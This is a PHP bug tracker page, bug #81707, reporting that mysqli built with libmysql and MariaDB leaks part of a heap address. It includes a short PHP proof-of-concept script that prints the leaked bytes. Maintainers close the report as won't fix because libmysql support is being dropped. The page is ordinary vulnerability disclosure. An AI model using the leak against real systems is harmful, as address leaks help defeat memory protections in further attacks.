php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #81707 Heap address leak when PHP is configured with libmysql + mariadb
Submitted: 2022-01-19 06:36 UTC Modified: 2022-02-15 14:25 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:0 (0.0%)
From: ive_jihwan at zerocution dot com Assigned: dharman (profile)
Status: Wont fix Package: MySQLi related
PHP Version: Irrelevant OS: WSL
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: ive_jihwan at zerocution dot com
New email:
PHP Version: OS:

 

 [2022-01-19 06:36 UTC] ive_jihwan at zerocution dot com 
Description:
------------
When PHP is configured with libmysql instead of mysqlnd, there is a possibility to leak emalloc()ed address via simple SQL query with bind_result and fetch.

This only copies the lower 4 bytes of the address, but since the MSB is fixed as 0x7f, it's reasonable to find a full heap address.

I tested this in WSL + MariaDB 10.5.13 + PHP 8.2.0-dev with libmysql build



Test script:
---------------
<?php
$mysqli = new mysqli("127.0.0.1", "test", "%");

$stmt = $mysqli->prepare("select 1");
$stmt->bind_result($a);
$stmt->prepare("select 1");
$stmt->execute();
$stmt->fetch();

echo "$a"; // the lowest 4 bytes of heap structure

if (!($a & (int)0xffffffff00000000)) {
        printf("Failed, try again\n");
        die();
}

printf("Address in heap leaked: 0x7fff%x\n", $a & 0xffffffff);

Expected result:
----------------
Should return 1 or 0


Actual result:
--------------
the lower 4 bytes of (int *)stmt->result.buf[0].val

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2022-01-19 06:42 UTC] stas@php.net
-Type: Security +Type: Bug
 [2022-02-15 14:25 UTC] dharman@php.net 
I am marking this as won't fix, because PHP 8.2 will drop support for libmysql. The integration of mysqli with libmysql was leaking memory for a long time (if not from the very beginning) and fixing this isn't easy. It could certainly be fixed but there is not much demand for this. As we are dropping the support altogether, fixing ancient bugs like this makes very little sense. Thanks for the report though.
 [2022-02-15 14:25 UTC] dharman@php.net
-Status: Open +Status: Wont fix -Assigned To: +Assigned To: dharman
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Thu May 23 06:01:35 2024 UTC